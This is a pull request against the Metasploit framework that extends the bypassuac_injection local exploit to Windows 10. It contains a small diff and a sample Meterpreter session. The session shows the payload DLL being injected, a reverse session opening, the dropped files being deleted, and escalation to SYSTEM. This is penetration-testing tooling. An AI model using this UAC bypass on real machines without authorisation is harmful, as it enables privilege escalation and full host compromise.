### PR TITLE
Add Windows 10 "support" to bypassuac_injection

### DIFF
--- a/modules/exploits/windows/local/bypassuac_injection.rb
+++ b/modules/exploits/windows/local/bypassuac_injection.rb
@@ -197,7 +197,7 @@ class Metasploit3 < Msf::Exploit::Local
     winver = sysinfo['OS']
 
     case winver
-    when /Windows (7|8|2008|2012)/
+    when /Windows (7|8|2008|2012|10)/
       print_good("#{winver} may be vulnerable.")
     else
       fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.")
@@ -221,7 +221,7 @@ class Metasploit3 < Msf::Exploit::Local
       paths[:szElevDir] = "#{win_path}\\System32\\sysprep"
       paths[:szElevDirSysWow64] = "#{win_path}\\sysnative\\sysprep"
       paths[:szElevExeFull] = "#{paths[:szElevDir]}\\sysprep.exe"
-    when /Windows (8|2012)/
+    when /Windows (8|2012|10)/
       paths[:szElevDll] = 'NTWDBLIB.dll'
       paths[:szElevDir] = "#{win_path}\\System32"
       # This should be fine to be left blank


### PR DESCRIPTION
After extensive research, lots of blood/sweat/tears, reverse engineering and intense sessions of x64 debugging, I present you this **EPIC** PR that enables support for bypassing UAC on Windows 10.

Yes, it was hard. But I decided to take one for the team. You're welcome. *
## Sample run

```
meterpreter > sysinfo
Computer        : DESKTOP-M9H28RB
OS              : Windows 10 (Build 10240).
Architecture    : x64
System Language : en_AU
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/win64
meterpreter > background
[*] Backgrounding session 1...
msf exploit(bypassuac_injection) > run

[*] Started reverse handler on 10.1.10.40:5555 
[+] Windows 10 (Build 10240). may be vulnerable.
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Uploading the Payload DLL to the filesystem...
[*] Spawning process with Windows Publisher Certificate, to inject into...
[+] Successfully injected payload in to process: 2420
[*] Sending stage (1133106 bytes) to 10.1.10.49
[*] Meterpreter session 2 opened (10.1.10.40:5555 -> 10.1.10.49:49676) at 2015-10-01 11:15:14 +1000
[+] Deleted C:\Users\oj\AppData\Local\Temp\XDaiducN.dll
[+] Deleted C:\Windows\System32\NTWDBLIB.dll

meterpreter > getuid
Server username: DESKTOP-M9H28RB\oj
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
## Verification
- [x] Create a Meterpreter session on a Windows 10 machine as a user who is in the administrators group.
- [x] Set up and run the `bypassuac_injection` module on this session.
- [x] Receive new session with full admin privs.
#### Footnotes

\* it might not have _actually_ been that much work.
